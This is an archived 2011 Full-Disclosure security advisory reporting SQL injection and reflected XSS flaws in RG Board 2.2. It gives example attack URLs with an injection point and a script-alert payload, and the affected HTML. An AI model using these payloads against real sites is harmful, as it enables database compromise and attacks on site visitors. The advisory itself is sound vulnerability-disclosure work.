lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 28 Jun 2011 08:30:07 -0500
From: Juan Sacco <jsacco@...ecurityresearch.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: INSECT Pro - Advisory 2011 0628 - SQL Injection -
	XSS - RGBoard 2.2

 Information
 --------------------
 Name : SQL Injection and XSS discovered
 Software : RG Board 2.2
 Vendor Homepage : http://www.rgboard.com/
 Vulnerability Type : SQL injection and XSS reflected
 Severity : High
 Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>

 Description
 ------------------
 RG Board 2.2 is prone to a SQL Injection and XSS reflected 
 vulnerabilitys because the application fails to properly perform 
 adequate boundary checks on user-supplied data.
 An attacker can exploit this issue to compromise the victim's machine.

 Details
 -------------------
 SQL injection is a code injection technique that exploits a security 
 vulnerability occurring in the database layer of an application (like 
 queries).

 Cross-site scripting (XSS) is a type of computer security vulnerability 
 typically found in web applications that enables attackers to inject 
 client-side script into web pages viewed by other users.

 Exploit example as follow
 -----------------------------

 SQL Injection:
 http://target.com/main/view.php?bbs_code=[injectme]&bd_num=106&kw=&ss[sc]=1&ss[st]=1
 This vulnerability affects /main/view.php using method GET

 XSS:
 http://target.com/main/list.php?bbs_code=news&page=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e

 The vulnerability is caused by the following code:
 <form id="category_form" action="?" method="get" 
 enctype="multipart/form-data">
 <p id="ba_content_list_top"><input type="hidden" name="bbs_code" 
 value="news" />
 <span class="floating_left">Category: <select name="ss[cat]" 
 onchange="this.form.submit();">
 <option value="">All</option>
 <option value="7">News</option>
 <option value="8">PR</option>
 <option value="9">Video</option>
 </select></span> <span class="floating_right">Total : 47 (1<ScRiPt 
 >alert(/XSS/)</ScRiPt>/3)</span></p>
 </form>


 Solution
 -------------------
 No patch are available at this time.

 Credits
 -------------------
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 _________________________________________________
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.6.1 was released stay tunned

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ